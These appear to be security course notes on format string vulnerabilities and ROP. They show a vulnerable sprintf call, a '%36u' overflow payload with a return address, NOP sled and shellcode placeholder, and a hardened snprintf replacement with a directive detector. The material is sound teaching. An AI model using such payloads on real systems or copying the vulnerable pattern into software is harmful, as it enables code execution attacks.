Sec24_07_ROP.pdf

Format String Vulnerabilities

char buf[32];
sprintf(buf, user);   /* user-controlled format string, no length bound */

%36u\x3c\xd3\xff\xbf<nops><shellcode>

%36u writes 36 bytes, overwriting buf (32 bytes) and the saved ebp (4 bytes).

Next write the return address, then a NOP sled, then the shellcode.
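As an added example (not part of the lecture notes), the hardened counterpart of sprintf(buf, user): a constant "%s" format so directives in the input stay literal, a bounded write, and a small input check that flags strings containing printf directives before they reach a formatting function. The function and macro names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 32

/* Hardened replacement for the notes' sprintf(buf, user): the format string is
 * the constant "%s", so any '%' directives in user are copied as literal text,
 * and snprintf never writes more than BUF_LEN bytes (terminator included).
 * Returns 1 if the whole input fit, 0 if it was truncated or an error occurred,
 * so the caller can reject over-long input instead of processing a cut-off copy. */
int copy_user_safely(char buf[BUF_LEN], const char *user) {
    int n = snprintf(buf, BUF_LEN, "%s", user);
    if (n < 0) {
        buf[0] = '\0';
        return 0;
    }
    return n < BUF_LEN;
}

/* Input-validation helper: returns 1 if s contains a '%' that a printf-style
 * function would interpret as a directive (anything other than the escaped
 * "%%"), 0 otherwise. A trailing lone '%' is flagged too, since printf's
 * behaviour on it is undefined. Useful for rejecting or logging input such as
 * the "%36u..." payload above before it reaches any formatting call. */
int has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* "%%" is a literal percent sign */
            s++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void) {
    char buf[BUF_LEN];
    const char *input = "%36u-constructed-sample";   /* constructed input */
    printf("directive present: %d\n", has_format_directive(input));
    printf("fit: %d, copied: \"%s\"\n", copy_user_safely(buf, input), buf);
    return 0;
}
```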

Return Oriented Programming

With ASLR enabled we cannot hard-code a pointer to a /bin/sh string. However, we can chain ROP gadgets to compute the address of /bin/sh at run time.